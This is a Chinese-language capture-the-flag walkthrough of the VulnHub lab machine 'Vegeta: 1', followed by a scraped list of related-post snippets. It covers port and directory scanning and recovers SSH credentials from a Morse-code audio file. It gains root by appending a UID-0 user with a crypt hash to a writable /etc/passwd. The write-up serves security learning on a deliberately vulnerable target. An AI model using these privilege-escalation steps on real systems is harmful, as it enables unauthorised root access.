vulnhub Vegeta: 1
渗透思路:
nmap扫描----gobuster扫描网站目录----在线解码摩斯电码,得到ssh用户名密码----/etc/passwd写入用户提权
环境信息:
靶机:192.168.101.77
攻击机:192.168.101.34
具体步骤:
1、nmap扫描
sudo nmap -sV -sC -p- 192.168.101.77
2、dirb扫描网站目录(兔子洞)
dirb http://192.168.101.77
发现http://192.168.101.77/robots.txt
(下面是一个兔子洞)
浏览器访问http://192.168.101.77/robots.txt,发现/find_me
浏览器访问/find_me,点击find_me.html,并查看网页源代码
view-source:http://192.168.101.77/find_me/find_me.html
拉到最下面发现一大段注释(没啥用就不复制粘贴了)
base64解码之后还是一堆没有意义的乱码,此路不通
3、gobuster扫描网站目录
gobuster dir -u http://192.168.101.77/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
扫描到/bulma
http://192.168.101.77/bulma/是个目录,里面有个文件hahahaha.wav
下载下来听了一下,感觉是摩斯电码
4、在线解码摩斯电码,得到ssh用户名密码
找了个在线翻译器:Morse Code Audio Decoder | Morse Code World
按upload上传hahahaha.wav,然后按play,自动转为文本信息
得到的结果是
USES: TRUNKS PASSWORD : US3R(S IN DOLLPS SYMBOL)
以用户名trunks,密码u$3r进行ssh登录
ssh trunks@192.168.101.77
5、/etc/passwd写入新用户提权
查看/home/trunks/.bash_history,发现其中有向/etc/passwd写入新用户的操作
查看/etc/passwd的文件权限
ls -al /etc/passwd
发现trunks用户有写权限
参考/home/trunks/.bash_history中的命令,先用perl生成加密的用户密码
perl -le 'print crypt("123456","addedsalt")'
以上命令中,用户的明文密码为123456
然后再将新用户test写入/etc/passwd
echo "test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >> /etc/passwd
最后切换到test用户,输入密码123456,获得root权限,并在/root目录下找到root.txt
su - test
vulnhub Vegeta: 1相关推荐
- vulnhub之vegeta
目录 一.主机发现 二.端口扫描 四.信息收集 五.cyberchef解密 1.两道base64解密. 2.save保存 3.qrcode module 4.二维码提取工具zbaring 六.大字典跑 ...
- 靶机13 VEGETA: 1
简介:这是一个完整的初学者的机器,获取标志 1.下载靶场 靶机名称:VEGETA: 1 下载地址: Vegeta: 1 ~ VulnHub 2.安装靶场 导入成功,开启此虚拟机( 当页面出现 Vege ...
- Vulnhub靶机:VEGETA_ 1
目录 介绍 信息收集 主机发现 主机信息探测 网站探测 目录扫描 cyberchef解密 分析二维码 二次目录爆破 分析摩斯电码-音频 提权 介绍 系列:Vegeta(此系列共1台) 发布日期:202 ...
- Vegeta靶机总结
Vegeta靶机渗透总结 靶机下载地址: https://download.vulnhub.com/vegeta/Vegeta.ova 修改vegeta靶机的网络连接模式为NAT,然后发现使用nmap ...
- 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!
Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...
- Vulnhub靶机渗透之 RAVEN: 1
目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- 【Vulnhub靶机系列】DC2
基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...
- 【Vulnhub靶机系列】DC1
基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...
最新文章
- kendoui仪表盘和柱状图 示例
- Spring 注解配置
- 判断字符串1是否在字符串2中出现的方法
- ili9341代码移植注意事项
- ModelSim 使用笔记1
- DNA甲基化检测服务
- 9.3磁盘及文件系统管理详解
- vant 引进单个样式_vue 公共列表选择组件,引用Vant-UI的样式方式
- LeetCode(509)——斐波那契数(JavaScript)
- RedHat配置yum源
- 亚马逊:贝佐斯没有闹钟
- 小甲鱼 c语言 20课 二维数组
- 设计算法判断单链表的全部 n 个字符是否中心对称
- AU降噪 李兴兴
- JRebel启动报错:compile error: cannot find constructor org.zeroturnaround.javarebel.integration.spring
- 美丽的诗句 撩妹首选哦!
- 利用传感器实现微信的摇一摇功能
- 简单静态web页面+动画(小案例)
- 计算机网络习题:应用层
- 据为己有!这位985博导把审稿的文章拒了,自己投!
热门文章
- 谈下mysql中间件(问题域、业内组件)
- 前端系列——vue2+高德地图web端开发(行政区边界绘制)
- 小小项目2:多项式四目计算器
- 使用python实现unix2dos和dos2unix命令
- 聚合固码,聚合支付接口,三方支付接口
- php中post换了么,php中post换行的代码介绍
- 如何用Python下载在线字典上的单词或者短语mp3
- 电子计算机发明于1946年对不对,2011国家公务员考试常识900题(最新)
- 中国大学生文科计算机大,人民大学学生参加2008(首届)中国大学生(文科)计算机设计大赛取得好成绩...
- xendesktop更新计算机,XenDesktop7.12发布Win10周年更新版桌面